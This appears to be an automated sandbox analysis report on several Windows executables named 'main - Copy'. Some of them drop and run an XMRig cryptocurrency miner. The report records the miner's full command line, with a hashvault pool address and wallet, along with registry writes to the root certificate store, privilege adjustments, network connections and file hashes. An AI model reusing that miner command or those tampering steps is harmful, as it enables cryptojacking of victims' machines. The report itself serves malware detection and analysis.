cd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
BE 2.17.107.99:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 99.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4792-14-0x000001BA56540000-0x000001BA56560000-memory.dmp

memory/4792-15-0x000001BA56590000-0x000001BA565B0000-memory.dmp

memory/4792-16-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-18-0x000001BA565D0000-0x000001BA565F0000-memory.dmp

memory/4792-17-0x000001BA565B0000-0x000001BA565D0000-memory.dmp

memory/4792-19-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-20-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-23-0x000001BA565D0000-0x000001BA565F0000-memory.dmp

memory/4792-22-0x000001BA565B0000-0x000001BA565D0000-memory.dmp

memory/4792-21-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-24-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-25-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-26-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-27-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-28-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-29-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-30-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-31-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-32-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-33-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-34-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-35-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-36-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-37-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-38-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-39-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-40-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-41-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-42-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-43-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-44-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-45-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-46-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-47-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-48-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-49-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-50-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-51-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-52-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-53-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-54-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-55-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-56-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-57-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-58-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-59-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-60-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-61-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-62-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-63-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-64-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-65-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-66-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-67-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-68-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-69-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-70-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-71-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-72-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-73-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-74-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-75-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-76-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-77-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-78-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-79-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-80-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-81-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

memory/4792-82-0x00007FF6C73E0000-0x00007FF6C7EE3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,14648456027158448592,4956305794400220180,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3880,i,14648456027158448592,4956305794400220180,262144 --variations-seed-version --mojo-platform-channel-handle=3144 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4324,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3992,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:38

Platform

win10v2004-20240508-en

Max time kernel

1781s

Max time network

1793s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1655s

Max time network

1668s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:44

Platform

win10v2004-20240508-en

Max time kernel

1655s

Max time network

1668s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:35

Platform

win10v2004-20240226-en

Max time kernel

1798s

Max time network

1816s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4028 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
SE 23.34.233.128:80 www.microsoft.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 128.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 163.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 147.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 130.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 95.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3664-16-0x000001FE648B0000-0x000001FE648D0000-memory.dmp

memory/3664-17-0x000001FE64A20000-0x000001FE64A40000-memory.dmp

memory/3664-18-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-19-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-20-0x000001FE64A40000-0x000001FE64A60000-memory.dmp

memory/3664-21-0x000001FEF8CC0000-0x000001FEF8CE0000-memory.dmp

memory/3664-22-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-23-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-26-0x000001FEF8CC0000-0x000001FEF8CE0000-memory.dmp

memory/3664-25-0x000001FE64A40000-0x000001FE64A60000-memory.dmp

memory/3664-24-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-27-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-28-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-29-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-30-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-31-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-32-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-33-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-34-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-35-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-36-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-37-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-38-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-39-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-40-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-41-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-42-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

memory/3664-43-0x00007FF6BA7D0000-0x00007FF6BB2D3000-memory.dmp

